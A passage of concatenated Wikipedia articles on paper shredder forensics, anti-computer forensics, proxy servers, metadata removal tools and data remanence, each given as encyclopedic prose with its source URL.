a given document may sometimes be offorensicinterest. Shredders display certain device-specific characteristics, "fingerprints", like the exact spacing of the blades, the degree and pattern of their wear. By closely examining the shredded material, the minute variations of size of the paper strips and the microscopic marks on their edges may be able to be linked to a specific machine.[25](cf. theforensic identification of typewriters.) The resulting shredded paper can be recycled in a number of ways, including:
https://en.wikipedia.org/wiki/Paper_shredder
Anti–computer forensicsorcounter-forensicsare techniques used to obstructforensic analysis. Anti-forensics has only recently[when?]been recognized as a legitimate field of study. One of the more widely known and accepted definitions comes from Marc Rogers. One of the earliest detailed presentations of anti-forensics, inPhrack Magazinein 2002, defines anti-forensics as "the removal, or hiding, of evidence in an attempt to mitigate the effectiveness of a forensics investigation".[1] A more abbreviated definition is given by Scott Berinato in his article entitled, The Rise of Anti-Forensics. "Anti-forensics is more than technology. It is an approach to criminal hacking that can be summed up like this: Make it hard for them to find you and impossible for them to prove they found you."[2]Neither author takes into account using anti-forensics methods to ensure the privacy of one's personal data. Anti-forensics methods are often broken down into several sub-categories to make classification of the various tools and techniques simpler. One of the more widely accepted subcategory breakdowns was developed by Dr. Marcus Rogers. He has proposed the following sub-categories: data hiding, artifact wiping, trail obfuscation and attacks against the CF (computer forensics) processes and tools.[3]Attacks against forensics tools directly has also been called counter-forensics.[4] Within the field of digital forensics, there is much debate over the purpose and goals of anti-forensic methods. Theconventional wisdomis that anti-forensic tools are purely malicious in intent and design. Others believe that these tools should be used to illustrate deficiencies in digital forensic procedures, digital forensic tools, and forensic examiner education. This sentiment was echoed at the 2005Blackhat Conferenceby anti-forensic tool authors, James Foster and Vinnie Liu.[5]They stated that by exposing these issues, forensic investigators will have to work harder to prove that collected evidence is both accurate and dependable. They believe that this will result in better tools and education for the forensic examiner. Also, counter-forensics has significance for defence againstespionage, as recovering information by forensic tools serves the goals of spies equally as well as investigators. Data hidingis the process of making data difficult to find while also keeping it accessible for future use. "Obfuscationandencryptionof data give an adversary the ability to limit identification and collection of evidence by investigators while allowing access and use to themselves."[6] Some of the more common forms of data hiding include encryption,steganographyand other various forms of hardware/software based data concealment. Each of the different data hiding methods makes digital forensic examinations difficult. When the different data hiding methods are combined, they can make a successful forensic investigation nearly impossible. One of the more commonly used techniques to defeat computer forensics isdata encryption. In a presentation given on encryption and anti-forensic methodologies, the Vice President of Secure Computing, Paul Henry, referred toencryptionas a "forensic expert's nightmare".[7] The majority of publicly available encryption programs allow the user to create virtual encrypted disks which can only be opened with a designated key. Through the use of modern encryption algorithms and various encryption techniques these programs make the data virtually impossible to read without the designated key. File level encryption encrypts only the file contents. This leaves important information such as file name, size and timestamps unencrypted. Parts of the content of the file can be reconstructed from other locations, such as temporary files, swap file and deleted, unencrypted copies. Most encryption programs have the ability to perform a number of additional functions that make digital forensic efforts increasingly difficult. Some of these functions include the use of akeyfile, full-volume encryption, andplausible deniability. The widespread availability of software containing these functions has put the field of digital forensics at a great disadvantage. Steganographyis a technique where information or files are hidden within another file in an attempt to hide data by leaving it in plain sight. "Steganography produces dark data that is typically buried within light data (e.g., a non-perceptible digital watermark buried within a digital photograph)."[8]While some experts have argued that the use of steganography techniques is not very widespread and therefore the subject shouldn't be given a lot of thought, most experts agree that steganography has the capability of disrupting the forensic process when used correctly.[2] According to Jeffrey Carr, a 2007 edition of Technical Mujahid (a bi-monthly terrorist publication) outlined the importance of using a steganography program called Secrets of the Mujahideen. According to Carr, the program was touted as giving the user the capability to avoid detection by currentsteganalysisprograms. It did this through the use of steganography in conjunction with file compression.[9] Other forms of data hiding involve the use of tools and techniques to hide data throughout various locations in a computer system. Some of these places can include "memory,slack space, hidden directories,bad blocks, alternate data streams, (and)hidden partitions."[3] One of the more well known tools that is often used for data hiding is called Slacker (part of theMetasploitframework).[10]Slacker breaks up a file and places each piece of that file into theslack spaceof other files, thereby hiding it from the forensic examination software.[8]Another data hiding technique involves the use of bad sectors. To perform this technique, the user changes a particular sector from good to bad and then data is placed onto that particular cluster. The belief is that forensic examination tools will see these clusters as bad and continue on without any examination of their contents.[8] The methods used in artifact wiping are tasked with permanently eliminating particular files or entire file systems. This can be accomplished through the use of a variety of methods that include disk cleaning utilities, file wiping utilities and disk degaussing/destruction techniques.[3] Disk cleaning utilities use a variety of methods to overwrite the existing data on disks (seedata remanence). The effectiveness of disk cleaning utilities as anti-forensic tools is often challenged as some believe they are not completely effective. Experts who don't believe that disk cleaning utilities are acceptable for disk sanitization base their opinions of current DOD policy, which states that the only acceptable form of sanitization is degaussing. (SeeNational Industrial Security Program.) Disk cleaning utilities are also criticized because they leave signatures that the file system was wiped, which in some cases is unacceptable. Some of the widely used disk cleaning utilities includeDBAN,srm,BCWipe Total WipeOut, KillDisk, PC Inspector and CyberScrubs cyberCide. Another option which is approved by theNISTand theNSAis CMRR Secure Erase, which uses the Secure Erase command built into theATAspecification. File wiping utilities are used to delete individual files from an operating system. The advantage of file wiping utilities is that they can accomplish their task in a relatively short amount of time as opposed to disk cleaning utilities which take much longer. Another advantage of file wiping utilities is that they generally leave a much smaller signature than disk cleaning utilities. There are two primary disadvantages of file wiping utilities, first they require user involvement in the process and second some experts believe that file wiping programs don't always correctly and completely wipe file information.[11][12]Some of the widely used file wiping utilities includeBCWipe, R-Wipe & Clean, Eraser, Aevita Wipe & Delete and CyberScrubs PrivacySuite. On Linux tools likeshredandsrmcan be also used to wipe single files.[13][14]SSDs are by design more difficult to wipe, since the firmware can write to other cells therefore allowing data recovery. In these instances ATA Secure Erase should be used on the whole drive, with tools likehdparmthat support it.[15] Diskdegaussingis a process by which a magnetic field is applied to a digital media device. The result is a device that is entirely clean of any previously stored data. Degaussing is rarely used as an anti-forensic method despite the fact that it is an effective means to ensure data has been wiped. This is attributed to the high cost of degaussing machines, which are difficult for the average consumer to afford. A more commonly used technique to ensure data wiping is the physical destruction of the device. TheNISTrecommends that "physical destruction can be accomplished using a variety of methods, including disintegration, incineration, pulverizing, shredding and melting."[16] The purpose of trail obfuscation is to confuse, disorient, and divert the forensic examination process. Trail obfuscation covers a variety of techniques and tools that include "log cleaners,spoofing,misinformation, backbone hopping, zombied accounts, trojan commands."[3] One of the more widely known trail obfuscation tools is Timestomp (part of theMetasploit Framework).[10]Timestomp gives the user the ability to modify filemetadatapertaining to access, creation and modification times/dates.[2]By using programs such as Timestomp, a user can render any number of files useless in a legal setting by directly calling into question the files' credibility.[citation needed] Another well known trail-obfuscation program is Transmogrify (also part of the Metasploit Framework).[10]In most file types the header of the file contains identifying information. A (.jpg) would have header information that identifies it as a (.jpg), a (.doc) would have information that identifies it as (.doc) and so on. Transmogrify allows the user to change the header information of a file, so a (.jpg) header could be changed to a (.doc) header. If a forensic examination program oroperating systemwere to conduct a search for images on a machine, it would simply see a (.doc) file and skip over it.[2] In the past anti-forensic tools have focused on attacking the forensic process by destroying data, hiding data, or altering data usage information. Anti-forensics has recently moved into a new realm where tools and techniques are focused on attacking forensic tools that perform the examinations. These new anti-forensic methods have benefited from a number of factors to include well documented forensic examination procedures, widely known forensic tool vulnerabilities, and digital forensic examiners' heavy reliance on their tools.[3] During a typical forensic examination, the examiner would create an image of the computer's disks. This keeps the original computer (evidence) from being tainted by forensic tools.Hashesare created by the forensic examination software to verify theintegrityof the image. One of the recent anti-tool techniques targets the integrity of the hash that is created to verify the image. By affecting the integrity of the hash, any evidence that is collected during the subsequent investigation can be challenged.[3] To prevent physical access to data while the computer is powered on (from a grab-and-go theft for instance, as well as seizure from Law Enforcement), there are different solutions that could be implemented: Some of these methods rely on shutting the computer down, while the data might be retained in the RAM from a couple of seconds up to a couple minutes, theoretically allowing for acold boot attack.[21][22][23]Cryogenically freezing the RAM might extend this time even further and some attacks on the wild have been spotted.[24]Methods to counteract this attack exist and can overwrite the memory before shutting down. Some anti-forensic tools even detect the temperature of the RAM to perform a shutdown when below a certain threshold.[25][26] Attempts to create a tamper-resistant desktop computer has been made (as of 2020, the ORWL model is one of the best examples). However, security of this particular model is debated by security researcher andQubes OSfounderJoanna Rutkowska.[27] While the study and applications of anti-forensics are generally available to protect users from forensic attacks of their confidential data by their adversaries (eg investigative journalists, human rights defenders, activists, corporate or governmentespionage), Mac Rogers of Purdue University notes that anti-forensics tools can also be used by criminals. Rogers uses a more traditional "crime scene" approach when defining anti-forensics. "Attempts to negatively affect the existence, amount and/or quality of evidence from a crime scene, or make the analysis and examination of evidence difficult or impossible to conduct."[3] Anti-forensic methods rely on several weaknesses in the forensic process including: the human element, dependency on tools, and the physical/logical limitations of computers.[28]By reducing the forensic process's susceptibility to these weaknesses, an examiner can reduce the likelihood of anti-forensic methods successfully impacting an investigation.[28]This may be accomplished by providing increased training for investigators, and corroborating results using multiple tools.
https://en.wikipedia.org/wiki/Anti-computer_forensics
Incomputer networking, aproxy serveris aserver applicationthat acts as anintermediarybetween aclientrequesting aresourceand the server providing that resource.[1]It improves privacy, security, and possibly performance in the process. Instead of connecting directly to a server that can fulfill a request for a resource, such as a file orweb page, the client directs the request to the proxy server, which evaluates the request and performs the required network transactions. This serves as a method to simplify or control the complexity of the request, or provide additional benefits such asload balancing, privacy, or security. Proxies were devised to add structure andencapsulationtodistributed systems.[2]A proxy server thus functions on behalf of the client when requesting service, potentially masking the true origin of the request to the resource server. A proxy server may reside on the user'slocal computer, or at any point between the user's computer and destination servers on theInternet. A proxy server that passes unmodified requests and responses is usually called agatewayor sometimes atunneling proxy. A forward proxy is an Internet-facing proxy used to retrieve data from a wide range of sources (in most cases, anywhere on the Internet). Areverse proxyis usually an internal-facing proxy used as a front-end to control and protect access to a server on a private network. A reverse proxy commonly also performs tasks such asload-balancing,authentication,decryption, andcaching.[3] Anopen proxyis aforwardingproxy server that is accessible by any Internet user. In 2008, network security expertGordon Lyonestimated that "hundreds of thousands" of open proxies are operated on the Internet.[4] A reverse proxy (or surrogate) is a proxy server that appears to clients to be an ordinary server. Reverse proxies send requests to one or more ordinary servers that handle the request. The response from the original server is returned as if it came directly from the proxy server, leaving the client with no knowledge of the original server.[5]Reverse proxies are installed in the vicinity of one or more web servers. Alltraffic coming from the Internetand with a destination of one of the neighborhood's web servers goes through the proxy server. The use of "reverse" originates in its counterpart "forward proxy" since the reverse proxy sits closer to the web server and serves only a restricted set of websites. There are several reasons for installing reverse proxy servers: A forward proxy is a server that routes traffic between clients and another system, which is in most occasions external to the network. This means it can regulate traffic according to preset policies, convert and mask client IP addresses, enforce security protocols and block unknown traffic. A forward proxy enhances security and policy enforcement within an internal network.[6]A reverse proxy, instead of protecting the client, is used to protect the servers. A reverse proxy accepts a request from a client, forwards that request to another one of many other servers, and then returns the results from the server that specifically processed the request to the client. Effectively a reverse proxy acts as a gateway between clients, users and application servers and handles all the traffic routing whilst also protecting the identity of the server that physically processes the request.[7] Acontent-filteringweb proxy server provides administrative control over the content that may be relayed in one or both directions through the proxy. It is commonly used in both commercial and non-commercial organizations (especially schools) to ensure that Internet usage conforms toacceptable use policy. Content filtering proxy servers will often supportuser authenticationto control web access. It also usually produceslogs, either to give detailed information about the URLs accessed by specific users or to monitorbandwidthusage statistics. It may also communicate todaemon-based orICAP-based antivirus software to provide security against viruses and othermalwareby scanning incoming content in real-time before it enters the network. Many workplaces, schools, and colleges restrict web sites and online services that are accessible and available in their buildings. Governments also censor undesirable content. This is done either with a specialized proxy, called a content filter (both commercial and free products are available), or by using a cache-extension protocol such as ICAP, that allows plug-in extensions to an open caching architecture. Websites commonly used by students to circumvent filters and access blocked content often include a proxy, from which the user can then access the websites that the filter is trying to block. Requests may be filtered by several methods, such as aURLorDNS blacklists, URL regex filtering,MIMEfiltering, or content keyword filtering. Blacklists are often provided and maintained by web-filtering companies, often grouped into categories (pornography, gambling, shopping, social networks, etc.). The proxy then fetches the content, assuming the requested URL is acceptable. At this point, a dynamic filter may be applied on the return path. For example,JPEGfiles could be blocked based on fleshtone matches, or language filters could dynamically detect unwanted language. If the content is rejected then an HTTP fetch error may be returned to the requester. Most web filtering companies use an internet-wide crawling robot that assesses the likelihood that content is a certain type. Manual labor is used to correct the resultant database based on complaints or known flaws in the content-matching algorithms.[8] Some proxies scan outbound content, e.g., for data loss prevention; or scan content for malicious software. Web filtering proxies are not able to peer inside secure sockets HTTP transactions, assuming the chain-of-trust of SSL/TLS (Transport Layer Security) has not been tampered with. The SSL/TLS chain-of-trust relies on trusted rootcertificate authorities. In a workplace setting where the client is managed by the organization, devices may be configured to trust a root certificate whose private key is known to the proxy. In such situations, proxy analysis of the contents of an SSL/TLS transaction becomes possible. The proxy is effectively operating aman-in-the-middle attack, allowed by the client's trust of a root certificate the proxy owns. If the destination server filters content based on the origin of the request, the use of a proxy can circumvent this filter. For example, a server usingIP-basedgeolocationto restrict its service to a certain country can be accessed using a proxy located in that country to access the service.[9]: 3 Web proxies are the most common means of bypassing government censorship, although no more than 3% of Internet users use any circumvention tools.[9]: 7 Some proxy service providers allow businesses access to their proxy network for rerouting traffic for business intelligence purposes.[10] In some cases, users can circumvent proxies that filter using blacklists by using services designed to proxy information from a non-blacklisted location.[11] Proxies can be installed in order toeavesdropupon the data-flow between client machines and the web. All content sent or accessed – including passwords submitted andcookiesused – can be captured and analyzed by the proxy operator. For this reason, passwords to online services (such as webmail and banking) should always be exchanged over a cryptographically secured connection, such as SSL. By chaining the proxies which do not reveal data about the original requester, it is possible to obfuscate activities from the eyes of the user's destination. However, more traces will be left on the intermediate hops, which could be used or offered up to trace the user's activities. If the policies and administrators of these other proxies are unknown, the user may fall victim to a false sense of security just because those details are out of sight and mind. In what is more of an inconvenience than a risk, proxy users may find themselves being blocked from certain Web sites, as numerous forums and Web sitesblock IP addressesfrom proxies known to havespammedortrolledthe site. Proxy bouncing can be used to maintain privacy. Acaching proxyserver accelerates service requests by retrieving the content saved from a previous request made by the same client or even other clients.[12]Caching proxies keep local copies of frequently requested resources, allowing large organizations to significantly reduce their upstream bandwidth usage and costs, while significantly increasing performance. Most ISPs and large businesses have a caching proxy. Caching proxies were the first kind of proxy server. Web proxies are commonly used tocacheweb pages from a web server.[13]Poorly implemented caching proxies can cause problems, such as an inability to use user authentication.[14] A proxy that is designed to mitigate specific link related issues or degradation is aPerformance Enhancing Proxy(PEPs). These are typically used to improveTCPperformance in the presence of high round-trip times or high packet loss (such as wireless or mobile phone networks); or highly asymmetric links featuring very different upload and download rates. PEPs can make more efficient use of the network, for example, by merging TCPACKs(acknowledgements) or compressing data sent at theapplication layer.[15] A translation proxy is a proxy server that is used to localize a website experience for different markets. Traffic from the global audience is routed through the translation proxy to the source website. As visitors browse the proxied site, requests go back to the source site where pages are rendered. The original language content in the response is replaced by the translated content as it passes back through the proxy. The translations used in a translation proxy can be either machine translation, human translation, or a combination of machine and human translation. Different translation proxy implementations have different capabilities. Some allow further customization of the source site for the local audiences such as excluding the source content or substituting the source content with the original local content. An anonymous proxy server (sometimes called a web proxy) generally attempts to anonymize web surfing.Anonymizersmay be differentiated into several varieties. The destination server (the server that ultimately satisfies the web request) receives requests from the anonymizing proxy server and thus does not receive information about the end user's address. The requests are not anonymous to the anonymizing proxy server, however, and so a degree of trust is present between the proxy server and the user. Many proxy servers are funded through a continued advertising link to the user. Access control: Some proxy servers implement a logon requirement. In large organizations, authorized users must log on to gain access to theweb. The organization can thereby track usage to individuals. Some anonymizing proxy servers may forwarddata packetswith header lines such as HTTP_VIA, HTTP_X_FORWARDED_FOR, or HTTP_FORWARDED, which may reveal the IP address of the client. Other anonymizing proxy servers, known as elite or high-anonymity proxies, make it appear that the proxy server is the client. A website could still suspect a proxy is being used if the client sends packets that include a cookie from a previous visit that did not use the high-anonymity proxy server. Clearing cookies, and possibly the cache, would solve this problem. Advertisers use proxy servers for validating, checking and quality assurance ofgeotargeted ads. A geotargeting ad server checks the request source IP address and uses ageo-IP databaseto determine the geographic source of requests.[16]Using a proxy server that is physically located inside a specific country or a city gives advertisers the ability to test geotargeted ads. A proxy can keep the internal network structure of a company secret by usingnetwork address translation, which can help thesecurityof the internal network.[17]This makes requests from machines and users on the local network anonymous. Proxies can also be combined withfirewalls. An incorrectly configured proxy can provide access to a network otherwise isolated from the Internet.[4] Proxies allow web sites to make web requests to externally hosted resources (e.g. images, music files, etc.) whencross-domain restrictionsprohibit the web site from linking directly to the outside domains. Proxies also allow the browser to make web requests to externally hosted content on behalf of a website when cross-domain restrictions (in place to protect websites from the likes of data theft) prohibit the browser from directly accessing the outside domains. Secondary market brokers use web proxy servers to circumvent restrictions on online purchases of limited products such as limited sneakers[18]or tickets. Web proxies forwardHTTPrequests. The request from the client is the same as aregular HTTP requestexcept the full URL is passed, instead of just the path.[19] This request is sent to the proxy server, the proxy makes the request specified and returns the response. Some web proxies allow theHTTP CONNECTmethod to set up forwarding of arbitrary data through the connection; a common policy is to only forward port 443 to allowHTTPStraffic. Examples of web proxy servers includeApache(withmod_proxyorTraffic Server),HAProxy,IISconfigured as proxy (e.g., with Application Request Routing),Nginx,Privoxy,Squid,Varnish(reverse proxy only),WinGate,Ziproxy, Tinyproxy, RabbIT andPolipo. For clients, the problem of complex or multiple proxy-servers is solved by a client-serverProxy auto-configprotocol (PAC file). SOCKSalso forwards arbitrary data after a connection phase, and is similar to HTTP CONNECT in web proxies. Also known as anintercepting proxy,inline proxy, orforced proxy, a transparent proxy intercepts normalapplication layercommunication without requiring any special client configuration. Clients need not be aware of the existence of the proxy. A transparent proxy is normally located between the client and the Internet, with the proxy performing some of the functions of agatewayorrouter.[20] RFC2616(Hypertext Transfer Protocol—HTTP/1.1) offers standard definitions: "A 'transparent proxy' is a proxy that does not modify the request or response beyond what is required for proxy authentication and identification". "A 'non-transparent proxy' is a proxy that modifies the request or response in order to provide some added service to the user agent, such as group annotation services, media type transformation, protocol reduction, or anonymity filtering". TCP Intercept is a traffic filtering security feature that protects TCP servers from TCPSYN floodattacks, which are a type of denial-of-service attack. TCP Intercept is available for IP traffic only. In 2009 a security flaw in the way that transparent proxies operate was published by Robert Auger,[21]and the Computer Emergency Response Team issued an advisory listing dozens of affected transparent and intercepting proxy servers.[22] Intercepting proxies are commonly used in businesses to enforce acceptable use policies and to ease administrative overheads since no client browser configuration is required. This second reason, however is mitigated by features such as Active Directory group policy, orDHCPand automatic proxy detection. Intercepting proxies are also commonly used by ISPs in some countries to save upstream bandwidth and improve customer response times by caching. This is more common in countries where bandwidth is more limited (e.g. island nations) or must be paid for. The diversion or interception of a TCP connection creates several issues. First, the original destination IP and port must somehow be communicated to the proxy. This is not always possible (e.g., where the gateway and proxy reside on different hosts). There is a class ofcross-site attacksthat depend on certain behaviors of intercepting proxies that do not check or have access to information about the original (intercepted) destination. This problem may be resolved by using an integrated packet-level and application level appliance or software which is then able to communicate this information between the packet handler and the proxy. Intercepting also creates problems forHTTPauthentication, especially connection-oriented authentication such asNTLM, as the client browser believes it is talking to a server rather than a proxy. This can cause problems where an intercepting proxy requires authentication, and then the user connects to a site that also requires authentication. Finally, intercepting connections can cause problems for HTTP caches, as some requests and responses become uncacheable by a shared cache. In integrated firewall/proxy servers where the router/firewall is on the same host as the proxy, communicating original destination information can be done by any method, for exampleMicrosoft TMGorWinGate. Interception can also be performed using Cisco'sWCCP(Web Cache Control Protocol). This proprietary protocol resides on the router and is configured from the cache, allowing the cache to determine what ports and traffic is sent to it via transparent redirection from the router. This redirection can occur in one of two ways:GRE tunneling(OSI Layer 3) or MAC rewrites (OSI Layer 2). Once traffic reaches the proxy machine itself, interception is commonly performed with NAT (Network Address Translation). Such setups are invisible to the client browser, but leave the proxy visible to the web server and other devices on the internet side of the proxy. Recent Linux and some BSD releases provide TPROXY (transparent proxy) which performs IP-level (OSI Layer 3) transparent interception and spoofing of outbound traffic, hiding the proxy IP address from other network devices. Several methods may be used to detect the presence of an intercepting proxy server: ACGIweb proxy accepts target URLs using aWeb formin the user's browser window, processes the request, and returns the results to the user's browser. Consequently, it can be used on a device or network that does not allow "true" proxy settings to be changed. The first recorded CGI proxy, named "rover" at the time but renamed in 1998 to "CGIProxy",[25]was developed by American computer scientist James Marshall in early 1996 for an article in "Unix Review" by Rich Morin.[26] The majority of CGI proxies are powered by one of CGIProxy (written in thePerllanguage), Glype (written in thePHPlanguage), or PHProxy (written in the PHP language). As of April 2016, CGIProxy has received about two million downloads, Glype has received almost a million downloads,[27]whilst PHProxy still receives hundreds of downloads per week.[28]Despite waning in popularity[29]due toVPNsand other privacy methods, as of September 2021[update]there are still a few hundred CGI proxies online.[30] Some CGI proxies were set up for purposes such asmaking websites more accessibleto disabled people, but have since been shut down due toexcessive traffic, usually caused by athird party advertising the serviceas a means to bypass local filtering. Since many of these users do not care about the collateral damage they are causing, it became necessary for organizations to hide their proxies, disclosing the URLs only to those who take the trouble to contact the organization and demonstrate a genuine need.[31] A suffix proxy allows a user to access web content by appending the name of the proxy server to the URL of the requested content (e.g. "en.wikipedia.org.SuffixProxy.com"). Suffix proxy servers are easier to use than regular proxy servers, but they do not offer high levels of anonymity, and their primary use is for bypassing web filters. However, this is rarely used due to more advanced web filters. Toris a system intended to provideonline anonymity.[32]Tor client software routes Internet traffic through a worldwide volunteer network of servers for concealing a user's computer location or usage from someone conductingnetwork surveillanceortraffic analysis. Using Tor makes tracing Internet activity more difficult,[32]and is intended to protect users' personal freedom and their online privacy. "Onion routing" refers to the layered nature of the encryption service: The original data are encrypted and re-encrypted multiple times, then sent through successive Tor relays, each one of which decrypts a "layer" of encryption before passing the data on to the next relay and ultimately the destination. This reduces the possibility of the original data being unscrambled or understood in transit.[33] TheI2P anonymous network('I2P') is a proxy network aiming atonline anonymity. It implementsgarlic routing, which is an enhancement of Tor's onion routing. I2P is fully distributed and works by encrypting all communications in various layers and relaying them through a network of routers run by volunteers in various locations. By keeping the source of the information hidden, I2P offers censorship resistance. The goals of I2P are to protect users' personal freedom, privacy, and ability to conduct confidential business. Each user of I2P runs an I2P router on their computer (node). The I2P router takes care of finding other peers and building anonymizing tunnels through them. I2P provides proxies for all protocols (HTTP,IRC, SOCKS, ...). The proxy concept refers to a layer-7 application in theOSI reference model.Network address translation(NAT) is similar to a proxy but operates in layer 3. In the client configuration of layer-3 NAT, configuring the gateway is sufficient. However, for the client configuration of a layer-7 proxy, the destination of the packets that the client generates must always be the proxy server (layer 7), then the proxy server reads each packet and finds out the true destination. Because NAT operates at layer 3, it is less resource-intensive than the layer-7 proxy, but also less flexible. As we compare these two technologies, we might encounter a terminology known as 'transparent firewall'.Transparent firewallmeans that the proxy uses the layer-7 proxy advantages without the knowledge of the client. The client presumes that the gateway is a NAT in layer 3, and it does not have any idea about the inside of the packet, but through this method, the layer-3 packets are sent to the layer-7 proxy for investigation.[citation needed] ADNSproxy server takes DNS queries from a (usually local) network and forwards them to an Internet Domain Name Server. It may also cache DNS records. Some client programs "SOCKS-ify" requests,[34]which allows adaptation of any networked software to connect to external networks via certain types of proxy servers (mostly SOCKS). A residential proxy is an intermediary that uses a real IP address provided by anInternet Service Provider (ISP)with physical devices such asmobilesandcomputers of end-users. Instead of connecting directly to aserver, residential proxy users connect to the target through residential IP addresses. The target then identifies them as organic internet users. It does not let any tracking tool identify the reallocation of the user.[35]Any residential proxy can send any number of concurrent requests, and IP addresses are directly related to a specific region.[36]Unlike regular residential proxies, which hide the user's real IP address behind another IP address, rotating residential proxies, also known asbackconnect proxies, conceal the user's real IP address behind a pool of proxies. These proxies switch between themselves at every session or at regular intervals.[37] Despite the providers assertion that the proxy hosts are voluntarily participating, numerous proxies are operated on potentially compromised hosts, includingInternet of thingsdevices. Through the process of cross-referencing the hosts, researchers have identified and analyzed logs that have been classified aspotentially unwanted programand exposed a range of unauthorized activities conducted by RESIP hosts. These activities encompassed illegal promotion, fast fluxing, phishing, hosting malware, and more.[38]
https://en.wikipedia.org/wiki/Proxy_server
Metadata removal toolormetadata scrubberis a type ofprivacy softwarebuilt to protect theprivacyof its users by removing potentially privacy-compromisingmetadatafrom files before they are shared with others, e.g., by sending them ase-mail attachmentsor by posting them on theWeb.[1][2] Metadata can be found in many types of files such asdocuments,spreadsheets,presentations,images, andaudiofiles. They can include information such as details on the file authors, file creation and modification dates, geographical location, document revision history, thumbnail images, and comments.[3]Metadata may be added to files by users, but some metadata is often automatically added to files by authoring applications or by devices used to produce the files, without user intervention. Since metadata is sometimes not clearly visible in authoring applications (depending on the application and its settings), there is a risk that the user will be unaware of its existence or will forget about it and, if the file is shared, private or confidential information will inadvertently be exposed. The purpose of metadata removal tools is to minimize the risk of such data leakage.[4] The metadata removal tools that exist today can be divided into four groups: To securely delete the metadata of aPDFfile, it is important to linearize the PDF file afterwards, otherwise changes are reversible and the metadata can be recovered.[5][6] Metadata removal tools are also commonly used to reduce the overall sizes of files, particularly image files posted on the Web. For example, a small image on a website, which may contain metadata including athumbnail image, can easily contain as much metadata as image data, thus removal of that metadata can halve the file size. This security software article is astub. You can help Wikipedia byexpanding it.
https://en.wikipedia.org/wiki/Metadata_removal_tool
Data remanenceis the residual representation ofdigital datathat remains even after attempts have been made to remove or erase the data. This residue may result from data being left intact by a nominalfile deletionoperation, by reformatting of storage media that does not remove data previously written to the media, or through physical properties of thestorage mediathat allow previously written data to be recovered. Data remanence may make inadvertent disclosure ofsensitive informationpossible should the storage media be released into an uncontrolled environment (e.g., thrown in the bin (trash) or lost). Various techniques have been developed to counter data remanence. These techniques are classified asclearing,purging/sanitizing, ordestruction. Specific methods includeoverwriting,degaussing,encryption, andmedia destruction. Effective application of countermeasures can be complicated by several factors, including media that are inaccessible, media that cannot effectively be erased, advanced storage systems that maintain histories of data throughout the data's life cycle, and persistence of data in memory that is typically considered volatile. Severalstandardsexist for the secure removal of data and the elimination of data remanence. Manyoperating systems,file managers, and other software provide a facility where afileis not immediatelydeletedwhen the user requests that action. Instead, the file is moved to aholding area(i.e. the "trash"), making it easy for the user to undo a mistake. Similarly, many software products automatically create backup copies of files that are being edited, to allow the user to restore the original version, or to recover from a possible crash (autosavefeature). Even when an explicit deleted file retention facility is not provided or when the user does not use it, operating systems do not actually remove the contents of a file when it is deleted unless they are aware that explicit erasure commands are required, like on asolid-state drive. (In such cases, the operating system will issue theSerial ATATRIMcommand or theSCSIUNMAP command to let the drive know to no longer maintain the deleted data.) Instead, they simply remove the file's entry from thefile systemdirectorybecause this requires less work and is therefore faster, and the contents of the file—the actual data—remain on thestorage medium. The data will remain there until theoperating systemreuses the space for new data. In some systems, enough filesystemmetadataare also left behind to enable easyundeletionby commonly availableutility software. Even when undelete has become impossible, the data, until it has been overwritten, can be read by software that readsdisk sectorsdirectly.Computer forensicsoften employs such software. Likewise,reformatting,repartitioning, orreimaginga system is unlikely to write to every area of the disk, though all will cause the disk to appear empty or, in the case of reimaging, empty except for the files present in the image, to most software. Finally, even when the storage media is overwritten, physical properties of the media may permit recovery of the previous contents. In most cases however, this recovery is not possible by just reading from the storage device in the usual way, but requires using laboratory techniques such as disassembling the device and directly accessing/reading from its components.[citation needed] § Complicationsbelow gives further explanations for causes of data remanence. There are three levels commonly recognized for eliminating remnant data: Clearingis the removal of sensitive data from storage devices in such a way that there is assurance that the data may not be reconstructed using normal system functions or software file/data recovery utilities. The data may still be recoverable, but not without special laboratory techniques.[1] Clearing is typically an administrative protection against accidental disclosure within an organization. For example, before ahard driveis re-used within an organization, its contents may be cleared to prevent their accidental disclosure to the next user. Purgingorsanitizingis the physical rewrite of sensitive data from a system or storage device done with the specific intent of rendering the data unrecoverable at a later time.[2]Purging, proportional to the sensitivity of the data, is generally done before releasing media beyond control, such as before discarding old media, or moving media to a computer with different security requirements. The storage media is made unusable for conventional equipment. Effectiveness of destroying the media varies by medium and method. Depending on recording density of the media, and/or the destruction technique, this may leave data recoverable by laboratory methods. Conversely, destruction using appropriate techniques is the most secure method of preventing retrieval. A common method used to counter data remanence is to overwrite the storage media with new data. This is often calledwipingorshreddinga disk or file, byanalogyto common methods ofdestroying print media, although the mechanism bears no similarity to these. Because such a method can often be implemented insoftwarealone, and may be able to selectively target only part of the media, it is a popular, low-cost option for some applications. Overwriting is generally an acceptable method of clearing, as long as the media is writable and not damaged. The simplest overwrite technique writes the same data everywhere—often just a pattern of all zeros. At a minimum, this will prevent the data from being retrieved simply by reading from the media again using standard system functions. TheUEFIin modern machines may offer a ATA class disk erase function as well. TheATA-6standard governs secure erases specifications. Bitlockeris whole disk encryption and illegible without the key. Writing a fresh GPT allows a new file system to be established. Blocks will set empty but LBA read is illegible. New data will be unaffected and work fine. In an attempt to counter more advanced data recovery techniques, specific overwrite patterns and multiple passes have often been prescribed. These may be generic patterns intended to eradicate any trace signatures; an example is the seven-pass pattern0xF6,0x00,0xFF,<random byte>,0x00,0xFF,<random byte>, sometimes erroneously attributed to US standardDOD 5220.22-M. One challenge with overwriting is that some areas of the disk may beinaccessible, due to media degradation or other errors. Software overwrite may also be problematic in high-security environments, which require stronger controls on data commingling than can be provided by the software in use. The use ofadvanced storage technologiesmay also make file-based overwrite ineffective (see the related discussion below under§ Complications). There are specialized machines and software that are capable of doing overwriting. The software can sometimes be a standalone operating system specifically designed for data destruction. There are also machines specifically designed to wipe hard drives to the department of defense specifications DOD 5220.22-M.[3] Writing zero to each block on hard disks and SSDs has the advantage of affording the firmware to deploy spare blocks when bad blocks are identified. Bitlocker has the advantage that data is illegible without the key. Seatools and other tools can erase disks with zero which is typical to revive old consumer class disks but they can wipe server disks albeit slowly. Modern 28TB and larger disks have an enormous number of LBA48 blocks. 40TB and 60TB disks will take proportionately longer times to wipe. Peter Gutmanninvestigated data recovery from nominally overwritten media in the mid-1990s. He suggestedmagnetic force microscopymay be able to recover such data, and developed specific patterns, for specific drive technologies, designed to counter such.[4]These patterns have come to be known as theGutmann method. Gutmann's belief in the possibility of data recovery is based on many questionable assumptions and factual errors that indicate a low level of understanding of how hard drives work.[5] Daniel Feenberg, an economist at the privateNational Bureau of Economic Research, claims that the chances of overwritten data being recovered from a modern 